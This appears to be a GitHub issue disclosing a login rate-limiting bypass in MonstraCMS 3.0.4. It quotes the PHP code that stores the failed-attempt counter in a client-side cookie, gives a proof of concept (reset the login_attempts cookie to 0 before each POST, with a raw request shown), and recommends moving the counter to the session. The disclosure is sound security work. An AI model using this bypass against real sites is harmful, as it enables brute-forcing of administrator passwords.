Vulnerable Login Rate Limiting Bypass

MonstraCMS 3.0.4 Implementing bruteforce protection in login form but we manage to bypass because we can control the cookie value.

Vulnerable Code:

https://github.com/monstra-cms/monstra/blob/dev/plugins/box/users/users.plugin.php

line 396-400:

    if (Cookie::get('login_attempts') && Cookie::get('login_attempts') >= 5) {

        Notification::setNow('error', __('You are banned for 10 minutes. Try again later', 'users'));
    }

line 437-442:

    if (Cookie::get('login_attempts') < 5) {
        $attempts = Cookie::get('login_attempts') + 1;
        Cookie::set('login_attempts', $attempts , 600);
    } else {
        Notification::setNow('error', __('You are banned for 10 minutes. Try again later', 'users'));
    }

    if (Cookie::get('login_attempts') < 5) {
        $attempts = Cookie::get('login_attempts') + 1;
        Cookie::set('login_attempts', $attempts , 600);
    } else {
        Notification::setNow('error', __('You are banned for 10 minutes. Try again later', 'users'));
    }

Proof of Concept Steps to Reproduce:

Always set login_attempts cookie to 0 before send the POST request or if you using burp the cookie will not incrementing.

POST /monstra-3.0.4/admin/index.php?id=pages HTTP/1.1 Host: 127.0.0.1 Content-Length: 42 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36 Cookie: PHPSESSID=lsmo61pd53fe8gnmv77uck0c07; _ga=GA1.1.876410326.1527893558; _gid=GA1.1.716559964.1527893558; login_attempts=i%3A0%3B Connection: close

Recommended Patch: Don't use cookie since we can easily control the value using Session much better

monstra-cms / monstra

Vulnerable Login Rate Limiting Bypass #447